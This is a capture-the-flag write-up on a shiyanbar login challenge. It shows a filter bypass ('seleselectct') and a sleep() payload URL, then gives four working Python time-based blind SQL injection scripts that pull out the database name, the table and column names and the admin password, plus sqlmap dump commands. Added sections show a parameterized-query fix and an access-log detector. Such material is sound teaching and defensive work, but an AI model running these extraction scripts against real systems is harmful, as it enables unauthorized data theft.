Hmm, opening the challenge I'm greeted by a rather fancy-looking image.
Looking at the page source, the form sends three parameters (admin, pass, action) to index.php via GET, but it limits the maximum length of the two input boxes to 10. That is only a front-end restriction and is effectively meaningless: we can press F12 in the browser and change the value, or simply type the parameters into the URL bar.
Next we type something arbitrary into the input boxes to see what errors come back and which key characters get filtered; trying a few sensitive strings helps here. We can see that whatever we enter in admin is echoed back on the screen. We also find that the username field filters select and #, but the select filter is only a naive single-pass removal, so it can be bypassed by writing seleselectct; and the error we get when entering admin as the username lets us confirm that the correct username is indeed admin.
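The filter described above strips each keyword only once, which is exactly why doubling it works, and stripping keywords is not a fix for the underlying problem in any case. As an added example (not the challenge's code; the in-memory table and its row are constructed stand-ins, and `naive_filter`, `login_concat` and `login_param` are names chosen here), the following Python shows the single-pass filter leaking `select` back out, a tautology-style username passing the concatenated login query, and a parameterized query treating the same input as plain data:

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge's admin table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'placeholder-secret')")
    conn.commit()
    return conn


def naive_filter(value):
    """Single-pass keyword stripping, the kind of filter the write-up defeats.

    re.sub removes every *existing* occurrence of 'select' in one left-to-right
    pass; it never rescans the text it produced, so 'seleselectct' becomes 'select'.
    """
    value = value.replace("#", "")
    return re.sub(r"select", "", value, flags=re.IGNORECASE)


def login_concat(conn, username, password):
    """Vulnerable: the filtered input is still concatenated into the SQL text."""
    sql = "SELECT username FROM admin WHERE username='%s' AND password='%s'" % (
        naive_filter(username), naive_filter(password))
    return sql, conn.execute(sql).fetchone()


def login_param(conn, username, password):
    """Hardened: bound parameters, so the input is data and never becomes SQL."""
    sql = "SELECT username FROM admin WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(naive_filter("seleselectct"))            # 'select' survives the filter
    sql, row = login_concat(db, "admin' or '1'='1", "")
    print(sql, "->", row)                          # logs in with no password
    print(login_param(db, "admin' or '1'='1", ""))  # None: the quote is just a character
```

The parameterized version needs no keyword list at all; the driver sends the query text and the values separately, so nothing the user types can change the statement's structure. Blocklist filters like the one in the challenge only ever raise the bar for the attacker's spelling.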
Now that we know the username, and since neither substring nor mid is filtered, we start building an injection payload to see whether it works.
http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and sleep(5) or '1'='0
Hmm, the page took 5 to 6 seconds to come back. That means the statement executed, so this is a time-based blind injection and it works!!
Time to write a Python 3 script.
Extract the database name
```python
import requests
import string

# Character set to try at each position of the database name.
# Note: characters such as ' % & # in string.punctuation are sent unencoded here,
# so they can break the URL or trip the filter; the expected names contain none of them.
gress = string.ascii_lowercase + string.ascii_uppercase + string.punctuation + string.digits
databaseName = ''

for i in range(1, 13):  # assume the database name is 12 characters long
    for playload in gress:
        # If the guess is right the server sleeps 10 s, which trips the 4 s client timeout
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr(database(),%s,1)='%s') then sleep(10) else 1 end or '1'='0" % (i, playload)
        # key={'pass':'','action':'login'}
        try:
            print("正在測試第%d個字符是否為'%s'" % (i, playload))
            r = requests.get(url, timeout=4)
        except requests.exceptions.Timeout:
            # A timeout means the sleep() branch ran, so this character is correct
            databaseName += playload
            print("數據庫名為是%s" % databaseName)
            break

print(databaseName)
```
The database name is test.
Next, extract the table names.
```python
import requests
import string

# Character set to try at each position of a table name
charset = string.ascii_lowercase + string.ascii_uppercase + string.digits + string.punctuation
tableName = []
for i in range(0, 5):  # assume web4 has five tables
    Name = ''
    flag2 = 0  # set once any character of this table name is found
    for col in range(1, 11):  # assume each table name is at most 10 characters
        flag = 0  # set once a character at this position is found
        for payload in charset:
            # seleselectct survives the single-pass keyword filter as select
            url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct table_name from information_schema.tables where table_schema='test' limit 1 offset %d),%d,1)='%s') then sleep(5) else 1 end or '1'='0" % (i, col, payload)
            try:
                print(url)
                r = requests.get(url, timeout=4)
            except requests.exceptions.Timeout:
                # A timeout means the sleep() branch ran, so this character is correct
                flag = 1
                flag2 = 1
                Name += payload
                print("第%s個表為是%s" % (i + 1, Name))
                break
        # tableName.append(Name)
        if flag == 0:
            break  # no character matched: the name is complete
    if flag2 == 0:
        break  # no table at this offset: we have them all
    tableName.append(Name)

for a in range(len(tableName)):
    print(tableName[a])
```

There is just one table, named admin.
Extract the column names
```python
import requests
import string

# Character set to try at each position of a column name
charset = string.ascii_lowercase + string.ascii_uppercase + string.digits + string.punctuation
columnName = []
for i in range(0, 5):  # assume the table has at most five columns
    Name = ''
    flag2 = 0  # set once any character of this column name is found
    for col in range(1, 11):  # assume each column name is at most 10 characters
        flag = 0  # set once a character at this position is found
        for payload in charset:
            url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct column_name from information_schema.columns where table_name='admin' limit 1 offset %d),%d,1)='%s') then sleep(5) else 1 end or '1'='0" % (i, col, payload)
            try:
                print(url)
                r = requests.get(url, timeout=4)
            except requests.exceptions.Timeout:
                # A timeout means the sleep() branch ran, so this character is correct
                flag = 1
                flag2 = 1
                Name += payload
                print("第%s個字段為是%s" % (i + 1, Name))
                break
        if flag == 0:
            break  # no character matched: the name is complete
    if flag2 == 0:
        break  # no column at this offset: we have them all
    columnName.append(Name)

for a in range(len(columnName)):
    print(columnName[a])
```

Extract the column contents
```python
import requests
import string

# Character set to try at each position of the password value
gress = string.ascii_lowercase + string.ascii_uppercase + string.punctuation + string.digits
value = ''

for i in range(1, 16):  # assume the value is no longer than 15 characters
    for playload in gress:
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct password from admin),%d,1)='%s') then sleep(5) else 1 end or '1'='0" % (i, playload)
        try:
            print("正在測試第%d個字符是否為'%s'" % (i, playload))
            r = requests.get(url, timeout=4)
        except requests.exceptions.Timeout:
            # A timeout means the sleep() branch ran, so this character is correct
            value += playload
            print("內容為是%s" % value)
            break

print(value)
```

OK, the content is idnuenna.
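Seen from the defender's side, the four scripts above leave a very recognisable trail in the web server's access log: a long run of requests from one client to index.php, each carrying sleep(), case when and substr() with only the position or the guessed character changing, and later the doubled seleselectct keyword. The detector below is an added example and not part of the write-up; the log lines are constructed (the IPs, timestamps and the hunter2 value are made up; only the /basic/inject/index.php path and the payload shape come from the page), and the indicator names are chosen here. It flags individual suspicious requests and then the clients that issue enough of them to look like character-by-character enumeration:

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined log format (IPs and times are made up)
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /basic/inject/index.php?pass=&action=login&admin=admin%27+and+case+when%28substr%28database%28%29%2C1%2C1%29%3D%27t%27%29+then+sleep%2810%29+else+1+end+or+%271%27%3D%270 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:47 +0000] "GET /basic/inject/index.php?pass=&action=login&admin=admin%27+and+case+when%28substr%28database%28%29%2C2%2C1%29%3D%27e%27%29+then+sleep%2810%29+else+1+end+or+%271%27%3D%270 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /basic/inject/index.php?pass=&action=login&admin=admin%27+and+case+when%28substr%28%28seleselectct+table_name+from+information_schema.tables%29%2C1%2C1%29%3D%27a%27%29+then+sleep%285%29+else+1+end+or+%271%27%3D%270 HTTP/1.1" 200 512
198.51.100.9 - - [10/Oct/2023:13:56:10 +0000] "GET /basic/inject/index.php?pass=hunter2&action=login&admin=admin HTTP/1.1" 200 512
"""

# ip, timestamp, method, request target, status, response size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)$')

# Indicator names are chosen here; each regex runs over the URL-decoded query string
INDICATORS = {
    "time_delay": re.compile(r"(?i)\b(sleep|benchmark)\s*\("),
    "conditional": re.compile(r"(?i)\bcase\s+when\b"),
    "char_probe": re.compile(r"(?i)\b(substr|substring|mid)\s*\("),
    "schema_read": re.compile(r"(?i)information_schema\."),
}
KEYWORDS = ("select", "union", "from", "where")


def nested_keywords(text):
    """Return keywords written to survive a single-pass strip filter.

    One global re.sub removes every occurrence present in the input; if the
    keyword is still there afterwards, the input was nested ('seleselectct').
    """
    found = []
    for kw in KEYWORDS:
        once = re.sub(kw, "", text, flags=re.IGNORECASE)
        if re.search(kw, once, re.IGNORECASE):
            found.append(kw)
    return found


def analyze_log(log_text, threshold=3):
    """Return (per-request findings, clients with >= threshold suspicious requests)."""
    findings = []
    per_ip = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status, size = m.groups()
        # Decode %xx escapes and '+' so the regexes see the SQL the server saw
        query = unquote_plus(target.partition("?")[2])
        hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
        hits += ["nested_" + kw for kw in nested_keywords(query)]
        if hits:
            per_ip[ip] += 1
            findings.append({"ip": ip, "time": ts, "indicators": hits})
    enumerating = [ip for ip, n in per_ip.items() if n >= threshold]
    return findings, enumerating


if __name__ == "__main__":
    found, noisy = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["time"], ",".join(f["indicators"]))
    print("enumerating clients:", noisy)
```

A single hit on `time_delay` is worth an alert on its own, since sleep() has no business in a login parameter; the per-client count is what separates one probe from the thousands of requests a character-by-character dump needs. Web application firewalls and database-side query logging catch the same pattern, and the real fix remains the parameterized query rather than a longer blocklist.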
Next, let's do the same injection with sqlmap.
In sqlmap, enter:
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin"
It confirms the parameter is injectable!
Dump the database names
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --dbs
Dump the table names
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --tables -D "test"
Dump the column names
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --columns -T "admin" -D "test"
Dump the contents
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --dump -C "password" -T "admin" -D "test"
Done, the password is out.